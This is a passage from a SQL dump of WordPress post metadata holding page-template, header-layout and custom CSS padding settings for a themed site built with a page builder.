!important;}'),(45484,3044,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45485,3044,'_wp_page_template','default'),(45486,3044,'slide_template','default'),(45487,3044,'_wpb_vc_js_status','false'),(45488,3044,'mkdf_page_content_behind_header_meta','no'),(45489,3044,'mkdf_disable_vertical_header_background_image_meta','no'),(45490,3044,'mkdf_disable_header_widget_areas_meta','no'),(45491,3044,'mkdf_show_title_area_meta','yes'),(45492,3044,'mkdf_title_area_type_meta','attika'),(45493,3044,'mkdf_menu_area_background_color_meta','#ffffff'),(45494,3044,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45495,3044,'mkdf_page_content_padding','150px 0'),(45496,3045,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45497,3045,'_wp_page_template','full-width.php'),(45498,3045,'slide_template','default'),(45499,3045,'_wpb_vc_js_status','true'),(45500,3045,'mkdf_page_content_behind_header_meta','no'),(45501,3045,'mkdf_disable_vertical_header_background_image_meta','no'),(45502,3045,'mkdf_disable_header_widget_areas_meta','no'),(45503,3045,'mkdf_show_title_area_meta','yes'),(45504,3045,'mkdf_title_area_type_meta','attika'),(45505,3045,'mkdf_menu_area_background_color_meta','#ffffff'),(45506,3045,'_wpb_shortcodes_custom_css','.vc_custom_1535549530866{padding-top: 50px !important;padding-bottom: 120px !important;}'),(45507,3045,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45508,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45509,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(45510,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45511,3046,'_wp_page_template','full-width.php'),(45512,3046,'slide_template','default'),(45513,3046,'_wpb_vc_js_status','true'),(45514,3046,'mkdf_page_content_behind_header_meta','no'),(45515,3046,'mkdf_disable_vertical_header_background_image_meta','no'),(45516,3046,'mkdf_disable_header_widget_areas_meta','no'),(45517,3046,'mkdf_show_title_area_meta','yes'),(45518,3046,'mkdf_title_area_type_meta','attika'),(45519,3046,'mkdf_menu_area_background_color_meta','#ffffff'),(45520,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(45521,3046,'_dp_original','377'),(45522,3046,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45523,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45524,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45525,3047,'_wp_page_template','full-width.php'),(45526,3047,'slide_template','default'),(45527,3047,'_wpb_vc_js_status','true'),(45528,3047,'mkdf_page_content_behind_header_meta','no'),(45529,3047,'mkdf_disable_vertical_header_background_image_meta','no'),(45530,3047,'mkdf_disable_header_widget_areas_meta','no'),(45531,3047,'mkdf_show_title_area_meta','yes'),(45532,3047,'mkdf_title_area_type_meta','attika'),(45533,3047,'mkdf_menu_area_background_color_meta','#ffffff'),(45534,3047,'_dp_original','377'),(45535,3047,'mkdf_page_content_padding','80px 0 140px'),(45536,3047,'mkdf_page_content_padding_mobile','0px 0px 0px 0px'),(45537,3047,'_wpb_shortcodes_custom_css','.vc_custom_1535372522645{padding-right: 80px !important;padding-left: 80px !important;}'),(45538,3047,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(45539,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45540,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(45541,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45542,3048,'_wp_page_template','full-width.php'),(45543,3048,'slide_template','default'),(45544,3048,'_wpb_vc_js_status','true'),(45545,3048,'mkdf_page_content_behind_header_meta','no'),(45546,3048,'mkdf_disable_vertical_header_background_image_meta','no'),(45547,3048,'mkdf_disable_header_widget_areas_meta','no'),(45548,3048,'mkdf_page_content_padding','0'),(45549,3048,'mkdf_header_type_meta','header-divided'),(45550,3048,'mkdf_show_title_area_meta','no'),(45551,3048,'mkdf_menu_area_background_color_meta','#ffffff'),(45552,3048,'mkdf_menu_area_background_transparency_meta','1'),(45553,3048,'mkdf_menu_area_height_meta','80'),(45554,3048,'mkdf_disable_footer_meta','yes'),(45555,3048,'mkdf_header_behaviour_meta','fixed-on-scroll'),(45556,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(45557,3048,'_dp_original','351'),(45558,3049,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45559,3049,'_wp_page_template','full-width.php'),(45560,3049,'slide_template','default'),(45561,3049,'_wpb_vc_js_status','true'),(45562,3049,'mkdf_page_content_behind_header_meta','no'),(45563,3049,'mkdf_disable_vertical_header_background_image_meta','no'),(45564,3049,'mkdf_disable_header_widget_areas_meta','no'),(45565,3049,'_wpb_shortcodes_custom_css','.vc_custom_1535113284246{padding-top: 130px !important;}.vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}'),(45566,3049,'mkdf_page_content_padding','0'),(45567,3049,'mkdf_header_type_meta','header-divided'),(45568,3049,'mkdf_show_title_area_meta','no'),(45569,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45570,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(45571,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45572,3050,'_wp_page_template','full-width.php'),(45573,3050,'slide_template','default'),(45574,3050,'_wpb_vc_js_status','true'),(45575,3050,'mkdf_page_content_behind_header_meta','no'),(45576,3050,'mkdf_disable_vertical_header_background_image_meta','no'),(45577,3050,'mkdf_disable_header_widget_areas_meta','no'),(45578,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(45579,3050,'mkdf_page_content_padding','0'),(45580,3050,'mkdf_header_type_meta','header-divided'),(45581,3050,'_dp_original','430'),(45582,3050,'mkdf_show_title_area_meta','no'),(45583,3051,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45584,3051,'_wp_page_template','full-width.php'),(45585,3051,'slide_template','default'),(45586,3051,'_wpb_vc_js_status','true'),(45587,3051,'mkdf_page_content_behind_header_meta','no'),(45588,3051,'mkdf_disable_vertical_header_background_image_meta','no'),(45589,3051,'mkdf_disable_header_widget_areas_meta','no'),(45590,3051,'mkdf_show_title_area_meta','no'),(45591,3051,'mkdf_page_content_padding','0'),(45592,3051,'_wpb_shortcodes_custom_css','.vc_custom_1534508236123{padding-right: 0px !important;}'),(45593,3051,'mkdf_disable_footer_meta','yes'),(45594,3052,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45595,3052,'_wp_page_template','full-width.php'),(45596,3052,'slide_template','default'),(45597,3052,'_wpb_vc_js_status','true'),(45598,3052,'mkdf_page_content_behind_header_meta','no'),(45599,3052,'mkdf_page_content_padding','130px 0 0 '),(45600,3052,'mkdf_disable_vertical_header_background_image_meta','no'),(45601,3052,'mkdf_disable_header_widget_areas_meta','no'),(45602,3052,'mkdf_show_title_area_meta','no'),(45603,3052,'_wpb_shortcodes_custom_css','.vc_custom_1533721367903{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1534512863336{padding-left: 0px !important;}'),(45604,3053,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45605,3053,'_wp_page_template','full-width.php'),(45606,3053,'slide_template','default'),(45607,3053,'_wpb_vc_js_status','true'),(45608,3053,'mkdf_page_content_behind_header_meta','no'),(45609,3053,'mkdf_page_content_padding','0 0 0 0'),(45610,3053,'mkdf_page_content_padding_mobile','0 0 0 0'),(45611,3053,'mkdf_header_type_meta','header-minimal'),(45612,3053,'mkdf_disable_vertical_header_background_image_meta','no'),(45613,3053,'mkdf_disable_header_widget_areas_meta','no'),(45614,3053,'mkdf_show_title_area_meta','no'),(45615,3053,'mkdf_disable_footer_meta','yes'),(45616,3053,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(45617,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45618,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45619,3054,'_wp_page_template','full-width.php'),(45620,3054,'slide_template','default'),(45621,3054,'_wpb_vc_js_status','true'),(45622,3054,'mkdf_page_content_behind_header_meta','no'),(45623,3054,'mkdf_page_content_padding','110px 0 0 '),(45624,3054,'mkdf_disable_vertical_header_background_image_meta','no'),(45625,3054,'mkdf_disable_header_widget_areas_meta','no'),(45626,3054,'_dp_original','513'),(45627,3054,'mkdf_show_title_area_meta','no'),(45628,3054,'_wpb_shortcodes_custom_css','.vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}.vc_custom_1534508595924{margin-top: -130px !important;}'),(45629,3055,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45630,3055,'_wp_page_template','default'),(45631,3055,'slide_template','default'),(45632,3055,'_wpb_vc_js_status','true'),(45633,3055,'mkdf_page_content_behind_header_meta','no'),(45634,3055,'mkdf_disable_vertical_header_background_image_meta','no'),(45635,3055,'mkdf_disable_header_widget_areas_meta','no'),(45636,3055,'mkdf_show_title_area_meta','no'),(45637,3055,'mkdf_disable_footer_meta','yes'),(45638,3055,'mkdf_menu_area_in_grid_meta','yes'),(45639,3055,'mkdf_header_type_meta','header-minimal'),(45640,3055,'mkdf_page_content_padding','0 0 0 0'),(45641,3055,'mkdf_page_content_padding_mobile','0 0 0 0'),(45642,3055,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(45643,3441,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45644,3441,'_wp_page_template','full-width.php'),(45645,3441,'slide_template','default'),(45646,3441,'_wpb_vc_js_status','true'),(45647,3441,'mkdf_page_content_behind_header_meta','no'),(45648,3441,'mkdf_page_content_padding','0 0 0 0'),(45649,3441,'mkdf_page_content_padding_mobile','0 0 0 0'),(45650,3441,'mkdf_header_type_meta','header-vertical'),(45651,3441,'mkdf_disable_vertical_header_background_image_meta','no'),(45652,3441,'mkdf_disable_header_widget_areas_meta','no'),(45653,3441,'mkdf_show_title_area_meta','no'),(45654,3441,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(45655,3441,'mkdf_custom_header_widget_area_one_meta','left-menu'),(45656,3441,'mkdf_disable_footer_meta','yes'),(45657,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45658,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(45659,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45660,3057,'_wp_page_template','full-width.php'),(45661,3057,'slide_template','default'),(45662,3057,'_wpb_vc_js_status','true'),(45663,3057,'mkdf_page_content_behind_header_meta','no'),(45664,3057,'mkdf_page_content_padding','130px 0 0 '),(45665,3057,'mkdf_disable_vertical_header_background_image_meta','no'),(45666,3057,'mkdf_disable_header_widget_areas_meta','no'),(45667,3057,'mkdf_show_title_area_meta','no'),(45668,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(45669,3057,'_dp_original','513'),(45670,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45671,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45672,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45673,3058,'_wp_page_template','full-width.php'),(45674,3058,'slide_template','default'),(45675,3058,'_wpb_vc_js_status','true'),(45676,3058,'mkdf_page_content_behind_header_meta','no'),(45677,3058,'mkdf_page_content_padding','130px 0 0'),(45678,3058,'mkdf_disable_vertical_header_background_image_meta','no'),(45679,3058,'mkdf_disable_header_widget_areas_meta','no'),(45680,3058,'mkdf_show_title_area_meta','no'),(45681,3058,'_dp_original','744'),(45682,3058,'_wpb_shortcodes_custom_css','.vc_custom_1535445887028{padding-top: 140px !important;padding-bottom: 35px !important;}.vc_custom_1535445909857{padding-bottom: 200px !important;}.vc_custom_1535380918653{padding-bottom: 40px !important;}.vc_custom_1534240845257{padding-bottom: 30px !important;}.vc_custom_1535446084271{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534234226432{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535445707647{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535382774510{padding-right: 0px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1535447972496{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535447959496{margin-top: -15px !important;margin-left: -30px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}'),(45683,3058,'_wpb_post_custom_css','.mkdf-row-parallax-background-elements-holder.mkdf-parallax-elements-top .mkdf-row-parallax-right{\n    top: 1%;\n}'),(45684,4035,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(45685,4035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45686,4035,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(45687,4035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45688,4035,'_wp_page_template','full-width.php'),(45689,4035,'slide_template','default'),(45690,4035,'_wpb_vc_js_status','true'),(45691,4035,'mkdf_page_content_behind_header_meta','no'),(45692,4035,'mkdf_disable_vertical_header_background_image_meta','no'),(45693,4035,'mkdf_disable_header_widget_areas_meta','no'),(45694,4035,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(45695,4035,'mkdf_page_content_padding','0'),(45696,4035,'mkdf_header_type_meta','header-divided'),(45697,4035,'mkdf_show_title_area_meta','no'),(45698,4035,'_dp_original','430'),(45699,3060,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45700,3060,'_wp_page_template','full-width.php'),(45701,3060,'slide_template','default'),(45702,3060,'_wpb_vc_js_status','true'),(45703,3060,'mkdf_page_content_behind_header_meta','no'),(45704,3060,'mkdf_page_content_padding','0 0 0 0 '),(45705,3060,'mkdf_page_content_padding_mobile','0 0 0 0'),(45706,3060,'mkdf_set_menu_area_position_meta','center'),(45707,3060,'mkdf_disable_vertical_header_background_image_meta','no'),(45708,3060,'mkdf_menu_area_background_color_meta','#ffffff'),(45709,3060,'mkdf_menu_area_background_transparency_meta','0.4'),(45710,3060,'mkdf_disable_header_widget_areas_meta','no'),(45711,3060,'mkdf_show_title_area_meta','no'),(45712,3060,'mkdf_disable_footer_meta','yes'),(45713,3060,'mkdf_header_type_meta','header-standard'),(45714,3060,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(45715,3060,'mkdf_header_behaviour_meta','no-behavior'),(45716,3061,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45717,3061,'_wp_page_template','default'),(45718,3061,'slide_template','default'),(45719,3061,'_wpb_vc_js_status','false'),(45720,3061,'mkdf_page_content_behind_header_meta','no'),(45721,3061,'mkdf_disable_vertical_header_background_image_meta','no'),(45722,3061,'mkdf_disable_header_widget_areas_meta','no'),(45723,3062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45724,3062,'_wp_page_template','default'),(45725,3062,'slide_template','default'),(45726,3062,'_wpb_vc_js_status','true'),(45727,3062,'mkdf_page_content_behind_header_meta','no'),(45728,3062,'mkdf_page_content_padding','120px 0 160px 0'),(45729,3062,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(45730,3062,'mkdf_disable_vertical_header_background_image_meta','no'),(45731,3062,'mkdf_disable_header_widget_areas_meta','no'),(45732,3062,'mkdf_title_area_type_meta','attika'),(45733,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45734,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45735,3063,'_wp_page_template','default'),(45736,3063,'slide_template','default'),(45737,3063,'_wpb_vc_js_status','true'),(45738,3063,'mkdf_page_content_behind_header_meta','no'),(45739,3063,'mkdf_page_content_padding','122px 0 160px 0'),(45740,3063,'mkdf_page_content_padding_mobile','122px 0 160px 0'),(45741,3063,'mkdf_disable_vertical_header_background_image_meta','no'),(45742,3063,'mkdf_disable_header_widget_areas_meta','no'),(45743,3063,'mkdf_title_area_type_meta','attika'),(45744,3063,'_dp_original','1151'),(45745,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45746,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45747,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45748,3064,'_wp_page_template','full-width.php'),(45749,3064,'slide_template','default'),(45750,3064,'_wpb_vc_js_status','true'),(45751,3064,'mkdf_page_content_behind_header_meta','no'),(45752,3064,'mkdf_page_content_padding','30px 30px 50px 30px'),(45753,3064,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(45754,3064,'mkdf_disable_vertical_header_background_image_meta','no'),(45755,3064,'mkdf_disable_header_widget_areas_meta','no'),(45756,3064,'mkdf_title_area_type_meta','attika'),(45757,3064,'_dp_original','1160'),(45758,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45759,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45760,3065,'_wp_page_template','default'),(45761,3065,'slide_template','default'),(45762,3065,'_wpb_vc_js_status','true'),(45763,3065,'mkdf_page_content_behind_header_meta','no'),(45764,3065,'mkdf_page_content_padding','120px 0 170px 0'),(45765,3065,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(45766,3065,'mkdf_disable_vertical_header_background_image_meta','no'),(45767,3065,'mkdf_disable_header_widget_areas_meta','no'),(45768,3065,'mkdf_title_area_type_meta','attika'),(45769,3065,'_dp_original','1151'),(45770,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45771,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45772,3066,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45773,3066,'_wp_page_template','default'),(45774,3066,'slide_template','default'),(45775,3066,'_wpb_vc_js_status','true'),(45776,3066,'mkdf_page_content_behind_header_meta','no'),(45777,3066,'mkdf_page_content_padding','100px 0 100px 0'),(45778,3066,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(45779,3066,'mkdf_disable_vertical_header_background_image_meta','no'),(45780,3066,'mkdf_disable_header_widget_areas_meta','no'),(45781,3066,'mkdf_title_area_type_meta','attika'),(45782,3066,'_dp_original','1160'),(45783,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45784,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45785,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45786,3067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45787,3067,'_wp_page_template','full-width.php'),(45788,3067,'slide_template','default'),(45789,3067,'_wpb_vc_js_status','true'),(45790,3067,'mkdf_page_content_behind_header_meta','no'),(45791,3067,'mkdf_page_content_padding','30px 30px 50px 30px'),(45792,3067,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(45793,3067,'mkdf_disable_vertical_header_background_image_meta','no'),(45794,3067,'mkdf_disable_header_widget_areas_meta','no'),(45795,3067,'mkdf_title_area_type_meta','attika'),(45796,3067,'_dp_original','1167'),(45797,3068,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45798,3068,'_wp_page_template','full-width.php'),(45799,3068,'slide_template','default'),(45800,3068,'_wpb_vc_js_status','true'),(45801,3068,'mkdf_page_content_behind_header_meta','no'),(45802,3068,'mkdf_page_content_padding','0 0 0 0'),(45803,3068,'mkdf_page_content_padding_mobile','0 0 0 0'),(45804,3068,'mkdf_disable_header_meta','yes'),(45805,3068,'mkdf_disable_vertical_header_background_image_meta','no'),(45806,3068,'mkdf_disable_header_widget_areas_meta','no'),(45807,3068,'mkdf_show_title_area_meta','no'),(45808,3068,'_wpb_shortcodes_custom_css','.vc_custom_1534251303879{background-color: #eff5f8 !important;}.vc_custom_1534849547927{margin-top: -1px !important;}.vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}.vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}.vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534848855900{padding-top: 0px !important;}.vc_custom_1534859739459{padding-top: 100px !important;}.vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}.vc_custom_1534927596297{margin-top: -500px !important;}.vc_custom_1534927611021{margin-top: -313px !important;}'),(45809,3068,'_wpb_post_custom_css','@media only screen and (min-width: 1025px) and (max-width: 1440px) {\n    #mkdf-back-to-top {\n        right: 55px; \n    }\n}'),(45810,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45811,3069,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45812,3069,'_wp_page_template','full-width.php'),(45813,3069,'slide_template','default'),(45814,3069,'_wpb_vc_js_status','true'),(45815,3069,'mkdf_page_content_behind_header_meta','no'),(45816,3069,'mkdf_disable_vertical_header_background_image_meta','no'),(45817,3069,'mkdf_disable_header_widget_areas_meta','no'),(45818,3069,'mkdf_page_content_padding','80px 0 '),(45819,3069,'_dp_original','50'),(45820,3069,'_wpb_shortcodes_custom_css','.vc_custom_1534339141193{padding-bottom: 78px !important;}.vc_custom_1534253493197{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253549960{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253609963{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253600292{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253651419{padding-top: 85px !important;padding-bottom: 77px !important;}.vc_custom_1534253670577{padding-top: 85px !important;}'),(45821,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45822,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45823,3070,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45824,3070,'_wp_page_template','full-width.php'),(45825,3070,'slide_template','default'),(45826,3070,'_wpb_vc_js_status','true'),(45827,3070,'mkdf_page_content_behind_header_meta','no'),(45828,3070,'mkdf_disable_vertical_header_background_image_meta','no'),(45829,3070,'mkdf_disable_header_widget_areas_meta','no'),(45830,3070,'mkdf_page_content_padding','100px 0 110px'),(45831,3070,'_dp_original','1241'),(45832,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45833,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(45834,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45835,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45836,3071,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45837,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(45838,3071,'_wpb_shortcodes_custom_css','.vc_custom_1534336937178{padding-bottom: 30px !important;}'),(45839,3071,'_wp_page_template','full-width.php'),(45840,3071,'slide_template','default'),(45841,3071,'_wpb_vc_js_status','true'),(45842,3071,'mkdf_page_content_behind_header_meta','no'),(45843,3071,'mkdf_disable_vertical_header_background_image_meta','no'),(45844,3071,'mkdf_disable_header_widget_areas_meta','no'),(45845,3071,'mkdf_page_content_padding','120px 0 140px'),(45846,3071,'_dp_original','1250'),(45847,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45848,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(45849,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45850,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45851,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45852,3072,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(45853,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(45854,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px !important;}.vc_custom_1523972188182{padding-bottom: 11px !important;}.vc_custom_1523972203514{padding-bottom: 11px !important;}.vc_custom_1523972212180{padding-bottom: 11px !important;}.vc_custom_1523972218710{padding-bottom: 11px !important;}'),(45855,3072,'_wpb_shortcodes_custom_css','.vc_custom_1534260159095{padding-top: 27px !important;}.vc_custom_1523972196196{padding-bottom: 11px !important;}.vc_custom_1523972181946{padding-bottom: 11px 